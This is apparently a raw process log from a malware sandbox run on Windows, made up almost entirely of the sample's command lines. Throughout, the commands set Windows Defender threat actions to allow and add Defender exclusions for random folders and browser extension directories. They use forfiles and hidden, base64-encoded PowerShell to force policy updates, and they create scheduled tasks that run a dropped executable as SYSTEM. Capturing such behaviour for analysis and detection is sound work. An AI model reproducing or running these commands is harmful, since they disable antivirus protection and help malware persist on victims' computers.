powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 1996 -ip 1996
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1996 -s 556
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 1996 -ip 1996
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1996 -s 596
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\cmd.exe
/C powershell start-process -WindowStyle Hidden gpupdate.exe /force
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell start-process -WindowStyle Hidden gpupdate.exe /force
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 1996 -ip 1996
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1996 -s 620
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 1996 -ip 1996
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1996 -s 808
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 1996 -ip 1996
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1996 -s 876
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 1996 -ip 1996
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1996 -s 912
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 1996 -ip 1996
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1996 -s 892
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 1996 -ip 1996
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1996 -s 964
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 1996 -ip 1996
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1996 -s 972
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 1996 -ip 1996
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1996 -s 1100
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 1996 -ip 1996
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1996 -s 1100
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 1996 -ip 1996
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1996 -s 1128
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\IfTYFdYohdhRC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\IfTYFdYohdhRC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\cBfgrRECHDYJtCCxauR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\cBfgrRECHDYJtCCxauR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mgvwDscPBpUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mgvwDscPBpUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\sozrmRSxWUyU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\sozrmRSxWUyU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\xFHhRZnoU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\xFHhRZnoU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\asFrGLUBkJEUSBVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\asFrGLUBkJEUSBVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\ldmOewGvcKLHclGCa\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\ldmOewGvcKLHclGCa\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\gXItsKzEGiJHAsry\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\gXItsKzEGiJHAsry\" /t REG_DWORD /d 0 /reg:64;"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IfTYFdYohdhRC" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IfTYFdYohdhRC" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\IfTYFdYohdhRC" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\cBfgrRECHDYJtCCxauR" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\cBfgrRECHDYJtCCxauR" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mgvwDscPBpUn" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mgvwDscPBpUn" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\sozrmRSxWUyU2" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\sozrmRSxWUyU2" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xFHhRZnoU" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xFHhRZnoU" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\asFrGLUBkJEUSBVB /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\asFrGLUBkJEUSBVB /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\ldmOewGvcKLHclGCa /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\ldmOewGvcKLHclGCa /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\gXItsKzEGiJHAsry /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\gXItsKzEGiJHAsry /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gIoHxkEwv" /SC once /ST 16:10:09 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gIoHxkEwv"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 3484 -ip 3484
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3484 -s 444
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gIoHxkEwv"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "XvjVthUohNRwdLXcW" /SC once /ST 04:58:54 /RU "SYSTEM" /TR "\"C:\Windows\Temp\gXItsKzEGiJHAsry\AmzrHRuAsSfdqRu\TFXDRjP.exe\" Zb /GTIadidPc 385133 /S" /V1 /F
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "XvjVthUohNRwdLXcW"
C:\Windows\Temp\gXItsKzEGiJHAsry\AmzrHRuAsSfdqRu\TFXDRjP.exe
C:\Windows\Temp\gXItsKzEGiJHAsry\AmzrHRuAsSfdqRu\TFXDRjP.exe Zb /GTIadidPc 385133 /S
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 5060 -ip 5060
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5060 -s 1264
C:\Windows\SysWOW64\cmd.exe
